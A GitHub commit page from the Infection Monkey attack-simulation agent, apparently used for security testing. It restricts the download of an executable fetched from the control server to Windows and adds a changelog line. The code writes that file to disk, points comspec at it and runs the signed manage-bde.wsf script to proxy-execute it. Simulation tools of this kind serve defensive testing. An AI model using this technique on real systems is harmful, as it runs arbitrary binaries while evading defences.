Agent: Don't download exe on Linux during signed script PBA execution

This commit is contained in:
Shreya Malviya 2021-11-12 18:28:04 +05:30 committed by GitHub
parent 9f4bf71976
commit 59e7ac34f7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 14 additions and 5 deletions

View File

@ -21,6 +21,8 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
### Fixed ### Fixed
- A bug in network map page that caused delay of telemetry log loading. #1545 - A bug in network map page that caused delay of telemetry log loading. #1545
- Windows "run as a user" powershell command for manual agent runs. #1570 - Windows "run as a user" powershell command for manual agent runs. #1570
- A bug in the "Signed Script Proxy Execution" PBA that downloaded the exe on Linux
systems as well. #1557
### Security ### Security

View File

@ -1,22 +1,29 @@
import os import os
from infection_monkey.control import ControlClient from infection_monkey.control import ControlClient
from infection_monkey.utils.environment import is_windows_os
TEMP_COMSPEC = os.path.join(os.getcwd(), "T1216_random_executable.exe") TEMP_COMSPEC = os.path.join(os.getcwd(), "T1216_random_executable.exe")
def get_windows_commands_to_proxy_execution_using_signed_script(): def get_windows_commands_to_proxy_execution_using_signed_script():
download = ControlClient.get_T1216_pba_file() signed_script = ""
with open(TEMP_COMSPEC, "wb") as random_exe_obj:
random_exe_obj.write(download.content)
random_exe_obj.flush()
if is_windows_os():
_download_random_executable()
windir_path = os.environ["WINDIR"] windir_path = os.environ["WINDIR"]
signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf") signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf")
return [f"set comspec={TEMP_COMSPEC} &&", f"cscript {signed_script}"] return [f"set comspec={TEMP_COMSPEC} &&", f"cscript {signed_script}"]
def _download_random_executable():
download = ControlClient.get_T1216_pba_file()
with open(TEMP_COMSPEC, "wb") as random_exe_obj:
random_exe_obj.write(download.content)
random_exe_obj.flush()
def get_windows_commands_to_reset_comspec(original_comspec): def get_windows_commands_to_reset_comspec(original_comspec):
return f"set comspec={original_comspec}" return f"set comspec={original_comspec}"